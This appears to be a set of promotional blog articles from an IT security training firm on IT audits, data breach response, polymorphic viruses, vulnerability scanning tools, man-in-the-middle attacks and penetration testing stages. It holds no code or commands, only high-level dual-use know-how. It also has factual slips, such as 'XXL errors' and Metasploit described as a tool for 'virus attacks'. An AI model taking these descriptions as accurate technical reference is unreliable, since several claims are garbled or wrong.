- Management of IT and Enterprise Architecture: IT focuses on verifying that organizational structure and procedure that ensures a controlled and efficient information processing environment is developed by the IT management.
- Systems Development: This audit verifies the systems that are under the process of development meet the requirements and objectives of the organization. It also ensures that the systems are developed in line with generally accepted policies and standards for systems development.
- Client/Server, Intranets, extranets and Telecommunications: This audit verifies that the controls for telecommunications are in place both the client and the server ends as well as the network that connects both the clients and servers.
Types of Auditors
- Internal Auditor: This auditor usually performs internal accounts auditing as well as IS audits.
- External Auditor: This auditor reviews the findings and inputs, processes and outputs of the information systems made by the internal auditor.
Types of Audits
- Internal Audits: As explained above, an internal audit considers all the potential controls and hazards in an information system. It takes care if issues like operations, data, data integrity, security, privacy, software applications, productivity, expenditures, cost control and budgets. The auditor works with guidelines such as Information systems audit and control association which are available to make their job patterned.
- External Audits: This audits buttresses on information obtained from internal audits on information systems. External audit is performed by an certified information systems audit expert.
IT Audit Strategies
- We’ll discuss two areas here but first one must be able to determine if it is a compliance or substantive testing. The next thing to consider is how to go about gathering evidences to enable one perform application audits and make reports to the management.
What is substantive and Compliance Testing?
- Compliance testing involves gathering evidence to test if an organization is following the control procedures. For example, If an organization has a control procedure that says all application changes have to pass through a change control, an IT auditor will have to get the current running configurations of the router as well as the configuration file. After he does this, he can then run a file to compare the differences and use the result of the differences to look for a supporting change control documentation.
- Substantive Testing involves gathering evidence that enables one evaluate the data integrity of individual data and other information. For example, If an organization has a policy that has to do with backup tapes in storage locations offsite which includes three generations (Grandfather, father and son), then the IS auditor has to take physical inventory of the tapes in an offsite storage location as well. After this he can then compare it with the organizations inventory and also making sure the three generations are involved and are available at the time of the audit.
- The thing to discuss on is How to get the evidence that can help you audit the application and deliver a report to management. A few things you can review are;
- Review the IT organizational structure
- Review the IT policies and procedures
- Review the IT standards
- Review the IT documentations
- Review the organizations BIA
- Take time to interview employees
- Observe the employee’s performance
- Test controls and examine necessary incorporated entities
- Draft out a set of questionnaires
- Whether there is a thorough documentation of approved IS audit guideline?
- Whether IS audit guidelines are consistent with the security policy?
- Whether responsibilities for the IT audit has been assigned to a separate unit that is independent of the IT department?
- Whether periodic external IS audit is carried out?
- Whether independent security audit is conducted periodically?
- Whether contingency planning, insurance of assets, data integrity etc. are made part of External audit?
- Whether vulnerability and penetration testing were made part of external audit?
- Whether the major concerns brought out by previous Audit Reports have been highlighted and brought to the notice of the Top Management?
- Whether necessary corrective action has been taken to the satisfaction of the Management?
- Whether the facilities for conducting trainings which will enable IS audit teams to conduct the audit process effectively?
- Whether IS audit team is encouraged to keep themselves updated?
- Whether IS auditors exchange their views and share their experiences internally?
Operations is modern organizations are increasing dependent on IT, this is why IT audits are used to make sure that all information-related controls and methods are functioning properly. Most of all the companies if not all are IT driven and not enough awareness has been made on auditing of IT infrastructure the reason for this write up. If you’re in search of a professional firm to audit your organization, look no more as soutech web consults which is the number one IT consulting firms offers in Nigeria offers this service. Subscribe to us for your auditing and all types of IT-related issues.
Just recently it was in the news that over 7million Dropbox usernames and passwords were being stolen with initial reports that the Dropbox server itself was hacked. The company made this statement on their blog as quoted “The usernames and passwords and passwords that are referenced in these articles were stolen from unrelated services and not Dropbox. Attackers however, went further more to use the stolen credentials to attempt log in into our websites across the internet, including Dropbox”.
Stories and news of data and network breaches in organizational networks have become trending on every headline recently so regardless of where the loopholes are, it is something we hear frequently. So many highly profiled businesses that we interact with regularly such as restaurants, product retailers have had POS (Point of Sale) data breaches over the past months.
However, I will tell you a few tips on how to approach a data breach situation and some things you can put in place in case you’re faced by such situations.
What to do Immediately- First Things First
- First of all, try to determine the form of data breach that your information has been involved in. If it is an online data breach, then there is a possibility that your username and password might have been stolen, and if it is a POS data breach then it means your credit card numbers have been stolen as well.
- Now if it is a POS data breach from a product outlet or a store, a restaurant that you have just purchased something with, then immediately check your credit card credentials and bank details for any suspicious activity.
- Lookout for any alerts from the vendors that you use such that immediately a vulnerable vendor has contacted customers of password change, the user should do so too.
- Avoid any potential phishing email or emails that require you update your password and private information via email. One tip you should always look out for is to check the email id or web address to confirm it is the official email or web address of your financial institution.
- You can also change your other passwords if you use the same password over several accounts particularly the ones linked to your email account and those that contain your private and financial information. I advise you to go through you bank and credit card accounts as well.
- Always notify you financial institution whenever you receive any suspicious activity going on as regards your financial account. Make sure you let them know the breached institution which your credit was used. They can take immediate action by blocking any transaction to that account.
Meanwhile in the Interim
- Continue to keep a close eye on you bank or financial accounts. You could also subscribe for receiving transaction alerts via text and emails. It is policy now for every bank provide these services. Sometimes it may seem that you are now safe but a cybercriminal has patience has a key virtue and therefore may take months to make use of your stolen bank and financial information.
- You might as well contact the company which the data breach occurred when you did your transaction. They can provide you with information as regards the type of information that was leaked and the policies they have put in place to keep your personal details protected.
In the Long run
- A lot of businesses or organisations have developed a policy such that any customer that gets affected by a data breach is given a free year of data monitoring. You can also find out with the organisation if they have such policies or if they such services.
- I still lay emphasis on the use of a secure password coupled with a two-factor authentication as explained in my previous articles to be a key online safety means.
Data breaches however continue to be most frequent incidents these days like I said, there are ways to stay alert and be protected at all times. Luckily, if there are purchases you have made, there are anti-fraud laws in place to ensure your safety. If you find yourself in the clutch of any of the data breaches, be diligent enough to monitor your accounts. Soutech web consultants are just the right professionals to handle to fears. If you in anyway become a victim of sort, you can contact us at SOUTECH. Also, if you take all the methods and tips mentioned in this article and as long as you report any suspicious fraudulent activity then you are just as well informed as ever.
Polymorphic viruses have over the years been one of the most difficult and complex viruses to detect. Anti-virus manufacturing companies have had to spend days and months trying to create detection routines required to track a single polymorphic.
I’ll attempt to discuss about polymorphics and some of the detection mechanisms existing and also introducing Symantec’s striker Technology, a patent-pending mechanism for detection of polymorphics.
The Norton anti-virus 2.0 was the maiden version to include a striker for possible detection of polymorphics.
The Evolution of Polymorphic viruses
A computer virus can be defined as a self-replicating computer program that functions without the permission of the user. In order to spread, it attaches a copy of itself to some part of the program such as a word processor or a spreadsheet. A virus can also attack boot records and master boot records that contain all the information that a computer needs to startup.
Some viruses can replicate themselves, some may display messages input by its creator, some can be designed to deliver a part of a payload to corrupt programs, delete files, reformat a hard-disk drive, shutdown or crash a corporate network. I will quickly discuss about some viruses before we can relate it to polymorphic viruses.
All a simple virus does is to replicate itself such that if a user launches the program, the virus gains control of the computer and attaches a copy of itself to other program files. After it spreads successfully, the virus transfers control back to the host program, which functions normally. You can perform a simple anti-virus scan to detect this kind of infections.
The mode of operation of the encrypted virus was via signatures. Its idea was to hide the fixed signatures by scrambling the virus therefore making it unrecognizable by the virus scanner.
An encrypted virus is made up of a virus decryption routine as well as an encrypted virus body such that if the user launches the infected program, the virus decryption routine first gains control of the computer, then decrypts the body of the virus.
The polymorphic virus is built in such a way that it has a scrambled virus body and a decryption routine that first gains control and then decrypts the virus’ body. However, it possesses a third component which is a mutation engine that sort of generates randomized decryption routines which change each time the virus infects a new program.
The mutation engine and the virus body are both encrypted such that when a user runs a program infected with a polymorphic virus, the decryption routine first gains control of the computer, then decrypts both the virus body and the mutation engine.
The decryption routine then transfers control of the computer to the virus, which locates a new program to infect. At this point, the virus makes a copy of both itself and the mutation engine in random access memory (RAM). The next thing the virus does is that it invokes the mutation engine, which will randomly generate a new decryption routine that will decrypt the virus and yet does not bear any resemblance to the previous decryption routine. The virus encrypts the new copy of the virus’ body and the mutation engine. Finally, the virus then attaches this new decryption routine, alongside the newly encrypted virus and mutation engine to the new program.
So, we can see that not only is the virus’ body encrypted, but the decryption routine varies from infection to infection. This therefore confounds a virus scanner searching for the tell-tale sequence of bytes that identifies
a specific decryption routine. With a signature that is not fixed to scan for, and a non-fixed decryption routine as well, no two infections look alike.
Detecting a Polymorphic Virus
Anti-virus researchers launched an attempt to fight back by developing special detection routines crafted to detect and catch each and every polymorphic virus. Special programs were written by line for line which were designed to detect various sequences of computer codes known to be used by all the mutation engines to decrypt the virus body.
This approach was not feasible, it was as well time consuming and costly. Every new polymorphic virus needs its own detection program and also, a mutation engine which produces seemingly random programs which can properly execute decryption and some mutation engines to generate billions of variations.
Moreover, a lot of polymorphics make use of the same mutation engine, credits to the authors of viruses like dark avenger. In addition to this, different engines are being used by different polymorphics to generate a similar decryption routine, which can make identification of the virus solely based on decryption routines wholly unreliable.
This approach can be misleading by identifying one polymorphic as another. These shortcomings led anti-virus researchers to develop generic decryption techniques that trick a polymorphic virus into decrypting and revealing itself.
To gain more knowledge about all forms of malwares with malware analytical skills subscribe to our CEH course at Soutech Ventures. We have trained and seasoned experts to give you both theoretical and hands-on ethical hacking knowledge and skills.
In my previous articles, I have discussed intensively on vulnerability analysis and penetration testing but I’ll reiterate a few things to help buttress the points in this article.
Penetration plays a major role in the playbook of any security consultant and penetration test and it is the best clue to know how vulnerable a network is to an attack. Compliances such as PCI and HIPAA require vulnerability assessment and they also enable penetration testing to be performed smartly and in a targeted form when compared to performing simple port scans. Vulnerability assessments most importantly is the bedrock for developing an information security program that is proactive, going beyond reactive techniques such as starting firewalls and identifying loopholes and making attempts to seal them. But know this, that when installing and managing your websites and networks even if you might know much about the basic security measures and even follow them, it is never enough to discover and mitigate all the vulnerabilities by yourself.
Now lets us understand what a network vulnerability assessment is as an entity of penetration testing. A network penetration testing is a penetration testing technique that involves reviewing and analyzing a network in order to discover any possible security loopholes and vulnerabilities. Network administrators and network security staff use this technique to do a thorough evaluation of their security architecture as well as to defend the computer network against any form of threats and vulnerabilities. It also helps them to assess the network to know its strength. But the key objective of this technique generally is to discover vulnerabilities that may compromise the overall privacy, security and operations of a computer network.
Network penetration testing Methodology
1. Data and Information gathering and project set up
- Reviewing the project to obtain all assumptions
- Listing and detailing out the IP scanned IP addresses
- Configuring the IDS and IPSes to accept the originating IP addresses
- An optional scan of all user credentials
- Obtaining contact information for both parties
- Planning the scans and including the time it is being performed
2. Scanning the tools being setup
This step involves configuring all the vulnerability scanning tools for “safemode”
3. Performing the vulnerability scan
This involves performing and in-depth scan of all provided IP addresses and identifying any security weaknesses and vulnerabilities on user credentials after they have been scanned.
4. Research and Verification of vulnerabilities
- Verifying all the discovered vulnerabilities
- Identifying false positives
- Determining any potential impacts of the vulnerabilities being exploited
- Prioritizing remediation efforts
- Developing specific plans and recommendations for the remediation
5. Create reports and a project close-out
- Delivering final and concluding reports
- Teleconferencing of the scheduled project conclusions
- Ensuring a full understanding of the remediation actions being recommended
- Facilitating knowledge transfer in and effective form
Network Vulnerability Assessment Tools
In order to carry out an automates security audit in any organization, vulnerability scanners play a very critical role. This is because they can scan the website, network and other internal systems for thousands of security risks and can automatically prioritize them alongside the right patches. Some can automatically perform the patches.
Scanning websites is an entirely different ballgame from network scans. In the case of websites, the scope of the scan ranges from Layer 2 to 7, considering the intrusiveness of the latest vulnerabilities. The correct approach for scanning websites starts from Web-level access, right up to scanning all back-end components such as databases. While most Web security scanners are automated, there could be a need for manual scripting, based on the situation.
1.OpenVas: This is a short for Open Vulnerability Assessment System and is a free network security tool that has most if its components licensed under GNU General Public License (GNL). This tools is very effective in scanning for thousands of vulnerabilities and supports concurrent and scheduled scans and tasks. Its main component is available as Linux packages and as virtual appliances that are downloadable for the purpose of testing and evaluation. OpenVas does not work on windows but it offers clients for windows platforms. It can run mainly on Linux platforms and can perform scans and receive over 33,000 updates daily of Network vulnerability tests.
OpenVas has a manager that controls its intelligence and it is command line based with full services of daemon for user management and feed management. It is not easy and quick to be installed but it has one of the richest features in It security scan.
2. Retina CS Community: This is a vulnerability scanning and patching tool for Microsoft and most third-party applications like Firefox, adobe etc. It can scan for vulnerabilities in mobile devices, virtualized applications, servers, web applications, and private clouds as well. It identifies missing patches and configuration issues. It has a software that which is called Retina Network Community which is to be installed first before actually installing the Retina Cs Community software. It works on windows server 2008 or later versions, Microsoft SQL 2008 version or its later versions and it also requires a .net framework 3.5 to be installed, it is IIS server enabled.
It gives you the option of choosing from a variety of scans with reporting templates which can specify IP address ranges. You could also provide any necessary credentials for scanned assets which may be required may make your reports come out in a readily and organized format including email alerts. Most businesses however may find its system requirements very stringent since it requires windows server.
3. Microsoft Baseline Security Analyzer (MBSA): This is a tool that can perform both local and remote scans on windows servers and desktop. These tools are very efficient because it can identify missing service packs, security patches and any common security misconfiguration. Platforms that support it are windows XP Windows 8 and 8.1, windows Server 2012 and windows server 2012 R2. It is an easy-to-understand tool and a straightforward tool as well. It provides options of selecting a single window machine to perform a scan where you can choose a name, specify IP addresses and even choose a domain. You could choose the platform you want to scan which can either be a Windows, IIS, SQL admin vulnerability, windows update or weak passwords.
5. SecureCheq: This is a tool that can perform local scans on both windows desktops and servers and is capable of identifying many insecure advanced windows settings such as COBIT, ISO, CIS standards. It deals majorly on common configuration errors which are related to OS hardening, communication security, data protection issues, audit logs and user account activities. Its free version can only perform less than 24 scans which is about a quarter of what its full version scans. SecureCheq is a simple tool which lists all the checked settings including passed or failed results. Even though it is easy to use and its ability to scan for advanced configuration settings, it cannot reach deep to scan general windows vulnerabilities and network based threats. But it however complements MBSA well enough by scanning for basic threats and performing a follow up scan using securecheq.
6. Qualys freeScan: This tool can perform about 10 free scans of URLs and IPs of local servers and machines on the internet. It can be downloaded from web portals which can be installed and run on virtual machines for scanning internal networks. It can scan for issues in SSL, and vulnerabilities in their related networks.
It may seem first see an online tool which appears to do scan via internet if you put in the local IP address, it prompts you to download to your system via virtual machines like VMware or VirtualBox image. This tool allows you to scan local networks and gives an interactive report of the threats and patches.
7. Wireshark: Wireshark, previously called Ethereal, is one of the most popularly used tools for network vulnerability testing or assessment. This is because it gives you a clear picture of happenings on your network. It works in promiscuous mode in order to capture all the traffic on a TCP broadcast domain. It has features of customized filters that can be configured to intercept specific traffic such as communication between two IP addresses, UDP-based DNS queries on that network.
Data obtained can be dumped into a capture file for later review. It can also look for stray IP addresses, unnecessary packet drops spoofed data packets and any suspicious single IP address. Although wireshark gives one a clearer and broader picture of the network activities, it however does not have its own intelligence and should therefore be used as a data provider.
8. Nmap: This has remained one of the most popular scanning tools for over a decade now. It has the capability of crafting data packets and perform scanning to a TCP granular level such as ACK, SYN scans etc. some of the characteristic of this tool include
- Algorithms for built-in signatures designed to guess OSes and its versions based on the TCP handshake
- It can detect remote devices on the network as well as firewalls, routers, and their models
- It can check for open and running ports and which ports can be exploited for simulation of attacks
- It gives results in plain text and verbose
- It is scripted to automate routine task and obtain evidence for audit reports
9. Metasploit: Metasploit is a tool that comes to play after scanning and sniffing have been done. It provides the following capabilities;
- It is a rigorous tool for performing scans against a set of IP addresses.
- It can be used for anti-forensics
- Programmers can write codes that can be used to exploit vulnerabilities and to test it on Metasploit if its working
- It is a commercially available tool for performing virus attacks.
10. Aircrack: This is a network scanning tool that acts as a sniffer, packet crafter and decoder. It targets a wireless network by subjecting a packet traffic to capture vital information about a certain underlying encryption. A Decryptor is then used to perform a brute-force on the captured file to find passwords. Aircrack can be found in kali-linux which is the most preferable.
11. Nikto: This is an interactive open source tool for scanning websites because it supports HTTPS and HTTP. Nikto works by
- Crawling a website like a human would do in a little amount of time
- It uses a technique known as mutation to create combinations of various HTTP tests to perform an attack.
- It finds critical loopholes like improper cookie handlings, XXL errors, upload misconfigurations etc.
- It dumps all the findings in a verbose mode which can also help in knowing more about vulnerabilities in a website.
Care should be applied when interpreting Nikto logs because it can result in too many things getting noticed and can trigger a false alarm.
12. Samurai framework: It is used to for deep-diving after a baseline check has been done by Nikto. It is a powerful scanning utility which can be used to target specific set of vulnerabilities. It is pure penetration testing tool which focuses on other penetration tools such as WebScarab for HTTP mapping.
13. SQLmap: This tool is a first-generation tool capable of exploiting SQL injection errors but it can as well take over the database server. It works for speedy fingerprinting of the database to find underlying OSes and file system to fetch data from the server.
Note that a regular scheduled network vulnerability scan can help an organization to identify loopholes and weaknesses in a network even before any cybercriminal can perform a seeming attack. The aim of performing a network vulnerability is to identify devices on your network without compromising the systems on your network. Therefore, ensure to conduct a periodic network vulnerability scan on your network in order to discover and mitigate and possible weaknesses on you network before it can be exploited.
Why do you need the services of a Network Penetration Tester?
A network penetration tester is specially and specifically with trained the expertise to effectively conduct penetration testing and network assessments. Note that is a penetration is improperly conducted, it could be detrimental to your organization and its daily operations. Some of the skills a Network security specializes in are;
- Data breach prevention
- Application security
- Security control testing
- Gap analysis maintenance
- Compliance testing and analysis
Who do you contact?
To get a range of services ranging from certifications and trainings in vulnerability and penetration testing and many more courses. We at Soutech web consults have a team of professionals that cannot only train you and your staff on vulnerability and penetration testing which is an entity of cyber security but also conduct them. Endeavour to visit us at soutech web consults or subscribe to our website to find out we can help your organization and your business mitigate any form network vulnerabilities by just implementing any of our test processes and technologies.
One of the major challenges which the cybersecurity world is facing is the way vulnerabilities are classified or grouped. Many security vendors, professionals and product developers have given different names the same type of vulnerabilities and it has grown to become a confusing idea to security practitioners when performing tests. This is the reason why some organisations such as CVE (Common Vulnerabilities and Exposures have come together to develop a common language for vulnerabilities.
The CVE which is sponsored by the Mitre Corporation, has set up a standard for which naming security vulnerabilities conventionally in other to make it easier to discuss, perform and document. A complete list of CVE for vulnerability testing can be downloaded from CVE.
CVE standard has been deployed by many security products to name but a few such as;
- Nessus Security scanner
- STAT (Security Threat Avoidance Technology
- Internet Scanner by ISS (Internet Security Systems)
Types of Vulnerability Scanners
Vulnerability scanners can be classified into;
- Host Based vulnerability scanners
- It identifies the issues that are inherent in the host system.
- This process of scanning is performed by using host-based scanners to check for the vulnerabilities.
- When the host-based tools load the mediator software to the target system, it traces the events that have occurred and sends the report to the security analyst for analysis and decide the next move.
- Network Based vulnerability scanners
- This process is performed using Network-based Scanners.
- The function of the network-based scanners is to detect the open ports, identify the unknown services and active and running ports.
- It then gives a result of all the possible vulnerabilities that are associated with these services.
- Database Based Vulnerability scanners
- The database -based vulnerability scanners will identify the security loopholes in the database
- Here, tools and techniques are applied to test if the database is susceptible to SQL injections. The tester performs an SQL injecting SQL queries into the database in to read any sensitive data from the database. If there are any loopholes, the cyber security expert then updates the data in the data and tries to patch the security issue.
Steps for Performing Vulnerability Testing
The full methodologies on how to perform Vulnerability testing can be found in my previous article on vulnerability testing. I will describe briefly the steps that can be used to carry out any vulnerability test.
1.Check for Live Hosts: Here we have to check if the host is alive on the network. We can also
- detect firewalls in the network
- Probe for open ports such as UDP and TCP ports and other ports
- TCP ports such as 1-111, 135,139, 443, 445 etc.
- UDP ports such as 53, 111, 135, 137, 161 and 500
Whether or not the target is alive or offline, the scan can still be done.
2. Detect Firewalls: Here we try to determine there is a firewall in front of the target system. This is because some systems may appear to be offline but in the actually sense they are just protected by firewalls to be off and can still be open to attacks.
This test also attempts to gather a lot of network information from the target network especially when doing UDP and TCP probing.
3. Determine Open services and ports: In this step, we try to scan the UDP and TCP ports in other to discover the ports and services that are open. The ports to be probed are UDP and TCP ports 65-535 and in most setups, it is recommended to use the best scan probes to save the network bandwidth and the network time. So during the performance of an indepth scan, the use of full profiled scan probes are recommended.
4. Detection of Operating Systems and Versions: This involves discovering the OS versions and the services in other to optimize it. Once the process of UDP and TCP port scanning have been over, the pen tester uses different techniques in other to identify the OS that is running on the target host and network.
5. Perform a profiled Vulnerability scan: A profiled scan is applied in order to get an optimized vulnerability scanning result. Profiled scans include;
- Best scan to get popular ports
- Quick Scan to get most common ports
- Firewall scan by performing stealth scan
- Aggressive Scan by performing full scan, exploits and for DOS attacks
6. Developing a detailed Report: There are different formats to generate reports and the outputs of risk analysis and remediation suggestions. You can read the the OWASP full vulnerability scan documents to get a template for presenting your reports.
Vulnerability Testing Tools
Vulnerability testing tools can be classified into Host-based tools and Data-based tools. I will describe a few tools which are efficient for performing vulnerability assessment.
|Host-Based||STAT||It scans multiple systems on the network.|
|TARA||An acronym for Tiger Analytical Research Assistant. It is a unix-based system scanner which detects a set of known vulnerabilities in the local host of the network.|
|Cain and Abel||It can be used for cracking HTTP passwords and for retrieving passwords by sniffing the network.|
|Metasploit||It is an open source platform on linux for developing, testing and exploit of codes.|
|WireShark||This is an open Source network protocol analyzing tool that runs on both Linux and Windows platforms. Used to sniff the services running on the network.|
|Nmap||This is also an open source utility tool for carrying out security audits.|
|Nessus||This is an agent-less platform for auditing, reporting and carrying out patch management integration.|
|Database-based||SQL diet||A tool door for the SQL server for performing dictionary attacks.|
|Secure Auditor||It enables a user to carryout enumeration, network scanning, auditing and also perform penetration testing and forensic on the operating systems.|
|DB-scan||It is a tool used for the detection of trojans on the database, and also detecting hidden trojans by performing baseline scanning.|
Advantages of Vulnerability Assessment
The common advantages of performing vulnerability assessments are;
- There are readily available open source tools for performing vulnerability assessments.
- It provides a platform to identify, detect and curb almost all vulnerabilities inherent on any system.
- Some of the afore mentioned tools are automated for scanning.
- These vulnerability assessment tools are easy to run on a regular basis.
Disadvantages of Vulnerability Assessment
- There is an increase in the rate of false positive results
- A vulnerability assessment tool can easily be detected by an Intrusion Detection System (IDS)/Firewall.
- Sometimes recent and latest vulnerabilities can be hardly noticed.
Vulnerability Assessment vs Penetration Testing
|Vulnerability Assessment||Penetration Testing|
|Functionality||To discover Vulnerabilities||To Identify and exploit known vulnerabilities|
|Mechanism||For discovery & scanning||Perform simulations|
|Focal point||Considers breadth over depth||Considers depth over breadth|
|Coverage of Completeness||High||Low|
|Cost of Use||Low to Moderate||High|
|Tester||House staff||An attacker or Penetration Tester|
|How often is being run||Run after every single equipment is loaded||Run once in a year or quarterly depending on organizations policy|
|Results provided||Gives partial and inconclusive details about the Vulnerabilities||It gives a complete detail of all the identified vulnerabilities|
When performing vulnerability testing, you must know that it depends on two major mechanisms which are vulnerability assessment and penetration testing which I have been able to differentiate summarily. Now, these two test methods differ from each other in the areas of the tasks they perform and the weight of their performance levels.
However, if one must achieve a comprehensive and well detailed vulnerability testing with reports, a combination of both methods is always recommended.
We at Soutech web consults have a professional team that can carry out well organized and detailed vulnerability testing on your organization. Do well to contact us today on our website.
I will simply describe a man-in-the-middle attack as eavesdropping. In this form of attack an attacker intercepts or gets in-between the transmission of data from a computer A(Client) to a computer B (Server/website). They can then inject tools that are programmed to listen-in on the transmissions with the aim of capturing valuable information. In many occasions, the data are modified in transmission in order to trick the user to give out sensitive information such as their log in credentials. Of course, if the user becomes a victim of this attack, his original data will be forwarded unaltered to the attackers preferred destination.
How Man-In-The-Middle attacks work
This attack comes in two forms
- The form that involves being within the physical proximity of the target.
- The form that involves the injection of a malware which is also known as a man-in-the-browser (MITB) attack.
In a traditional MITM attack, an attacker will have to gain access to a Wi-Fi router that is not unsecured. You will often find this kind of connections in public areas with free Wi-Fi hotspot and even in home’s. All the hacker tries to do is to scan the router in search of any weaknesses in configuration and poor use of passwords in the router. Immediately the hacker finds a loophole, they will proceed to injecting their tools to sniff the user and computer visits.
The man-in-the-browser attack is a newer variant of the man-in-the-middle attack and has gained a lot of popularity with cybercriminals because of its ease of execution. Here, the attacker needs a means to inject the malware into a computer after which it installs itself in the users’ browser without their knowledge. Data such as financial institutions is then recorded and sent between specified target site and the victim. The malware transmits the data back to the attackers’ system once it has collected the specific data it was programmed to collect.
A very good example of these type of attack was in recent discovery of the POODLE bug, to know more about the POODLE bug read here. This bug allowed the attackers to capture transmitted data between browsers such as login credentials for e-commerce, and other financial types of online accounts targeted to allow them have control of those accounts.
Another example was the attack on the 3rd of March 2015 by researchers called FREAK which worked such that it allows an attacker to sniff encrypted traffic flowing from a visitor to a website and the website in form of a MITB attack. To know more about the freak attack read here.
The vulnerability was a result of the old encryption standards developed in the 90s which was neglected when out in the custody of Google and Apple. Hackers were able to easily decrypt messages using the old code.
How to avoid this form of attacks.
Here are a few practical steps you can take to reduce the risk of the man-in-the-middle and man-the-browser attacks.
- Always look out for any potential phishing emails from attackers. Read more on phishing. To learn more about phishing, please take out to time to read through my article on phishing. This phishing attacks come in the form of asking you to click a certain link that is provided which demands that you update your password and other log in credentials. Instead of clicking those links, just take some time to type the URL of the website provided on your browser and access it from there.
- Ensure that “HTTPS” is always in the URL bar of any website you’re visiting.
- Avoid as much as possible direct connection to any public Wi-Fi routers. IF you need to connect, you can use a Virtual Private Network (VPN), you could also use a browser plug-in like HTTPS Everywhere (link) or ForceTLS (link).
- Ensure that your private network is always secured. Endeavor also to change any default usernames and passwords on your home router an any other internet device.
- Finally, MITB attacks primarily make use of malware for execution therefore you should update your system with a detailed internet security solution (anti-virus).
To learn more about Man-In-The-Middle attacks, subscribe to our very detailed and comprehensive course modules in Certified Ethical Hacking (CEH). In Soutech Ventures, we have certified tutors to guide through our course contents. visit our website today to enroll. www.soutechventures.com
Penetration which is colloquially referred to as pen test is a simulated attack that is being performed on a computer system or its network infrastructure with permissions from management to probe for security vulnerabilities, and a potential means of gaining access to data and other features on the system.
Penetration testing helps one to find out the vulnerability of a system to an attack and if the defense mechanism created are sufficient and which defense mechanisms or techniques employed that can be defeated. A typical penetration testing process focuses on finding vulnerabilities depending on the nature of the approved activity for a given engagement.
A security testing will never prove the absence of security flaws in a system but it can sure prove their presence.
Brief History of Penetration Testing
In the mid-1960s, for over 50years and more, as the sophistication of networks increased, white hat hackers have been putting in work to make sure computer systems are protected from unauthorized access by hackers. They understood if hackers gain access into their systems, they could even destroy information networks asides stealing information. As computers began to gain the ability to share data or information through and across communication lines, the challenge to protect information increased. These lines if broken and data compromised, contained or stolen.
As early as 1965, computer security experts warned the government and business outlets that because of the increasing capability of computers to share information and exchange vital data across communication lines, there could be an inevitable attempt to penetrate those communication lines during exchange of data. In the year 1967, in the annual joint computer conference which had over 15,000 cyber security experts in attendance, there were serious deliberations that computer communication lines could be penetrated by hackers. They coined the term penetration which has perhaps become a major challenge in computer communication today.
This meeting brought the idea of actually testing systems and networks to ensure that integrity is increased as the expansion of computer networks such RAND corporation which first discovered a major threat to internet communications. The RAND Corporation aliased with the Advance Research Projects Agency (ARPA) located in the US to produce a report known as The Willis Report named after its lead author. The Willis Report discussed this security issue with a proposition of policies to serve as countermeasures in security breaches.
From this report however, the government and organizations started to form teams with the sole responsibility of finding weaknesses and vulnerabilities in the computer networks and measures to protect the systems from unauthorized or unethical hacking or penetration.
Today, there are numerous and specialized options that are available for performing penetration testing. Many of these systems include tools that a range of features for testing the security of the operating system. For example, we have Kali Linux which can be used for performing penetration testing and digital forensics. Also contained in it are 8 standard tools such as burp suite, Nmap, Aircrack-ng, Kismet, Wireshark, the Metasploit framework and John the Ripper. Kali Linux has all these tools and many more and for a system to contain all this sophisticated tools goes to show how much sophisticated today’s technology has gradually become and how many hackers are finding ways to create problems for computer-driven networks and computing environments most the especially the internet.
Objectives of Penetration Testing
The objectives of an intense pen test involve
- Determining how an attacker can find any loopholes to unlawfully gain access to the systems assets that can be of harm to the fundamental security of the systems logs, files.
- Confirming that all the applicable controls like the vulnerability management methodologies and segmentation required for the good functioning of the system are in place
Types of Penetration Testing
- Black box penetration testing: Also referred to as blind testing. Here, the client does not give out any prior information of the system architecture to the pen tester. It may offer little as regards value to the pen tester since the client does not provide any information. It can require more money, more time as well as resources to carryout
- White box penetration testing: Also known as Here, the client provides the pen tester with a comprehensive and complete detail of the network and how is being applied.
- Grey box penetration testing: The client may provide incomplete or partial information of the system network.
Stages of Penetration Testing
There are basically 5 stages of a penetration test.
1. Reconnaissance and planning: This stage involves gathering intelligence such as network, mail servers and domain names in the bid to understand how the target system works and the potential vulnerabilities it is facing.
It also involves a thorough definition of the scope and the goals of the penetration test, including the systems that are to be addressed and the methods of testing to deployed.
2. Scanning: This stage requires an in-depth understanding of how the target applications will respond to any attempt of intrusion. Scanning can be performed in the following ways:
- Static analysis: This is a process involves a careful inspection of the codes in the application and how it behaves when it is run. These tools have the capability of scanning the entire code in a single pass.
- Dynamic Analysis: It involves a careful inspection of the codes in the application when in the running state. It is a more practical approach to scanning in that it gives the real-time view of the applications performance.
3. Gaining Access: In this stage, the pen tester uses web application attack techniques such as SQLs, XXLs and backdoors to unravel the vulnerabilities on the target system. In a quest to understand the damages they can cause on the target, the tester will try to exploit the vulnerabilities discovered by intercepting traffic, stealing data and escalating privileges etc.
4. Maintaining Access: The stage aims at achieving a persistent presence in the exploited system using the known vulnerabilities. Advanced threats which are capable of remaining on the system for months are logged into the system into to monitor changes, enhancements and any new information being loaded onto the system.
5. Results and Analysis: In this stage, all the results obtained from the penetration test are compiled comprehensively and in details. This includes;
- All the vulnerabilities that have been exploited
- All sensitive data that has been accessed
- The amount of time spent during maintaining access without being detected.
The security personnel then analyses the results in a bid to where necessary reconfigure the organization’s WAF settings and any other application security flaws. This is done to patch all the vulnerabilities and to protect information against any future attacks.
Classification of Penetration Testing
1. External Penetration Testing: An external penetration tests is targeted at the assets owned by an organization that are accessible to and on the internet. Examples of such assets can be,
- The organizations website
- Domain name servers
- Web applications
The major goal of the external pen test is to gain access and extract data.
2. Internal Penetration Testing: It attempts to mimic an attacker actually launching an attack on the network to find vulnerabilities or loopholes.
It involves an examination of the IT systems of an internal network for possible traces of vulnerabilities which can affect the confidentiality, integrity and availability, and thereby giving the organisation the clues to take steps to address such vulnerabilities.
Penetration Testing Services
I will describe 4 distinct penetration testing service offerings that we can provide you
- Vulnerability Scanning: This scanning technique provides a very transparent and mature offer but the biggest challenge always lies on whether to resell a service offering or to buy that can be used to internally scan the clients systems and networks. Every regulation requires scanning which is the first and easy step taken towards achieving security assurance. This is because all regulated customers need to scan.
- Penetration testing of Infrastructure: This offers tools such as Metasploit or Core Impact, that can be used to perform live exploits. Live ammunitions are used so you have to orchestrate or organize the test with the client in such a way that the amount of disruption during the tests is minimized. The pen tester should endeavor to test all externally visible IP addresses because it is what the bad guys want in order to penetrate the system and network. The tester should also attach to the conference room network which is one of the softest parts of the customers’ defense.
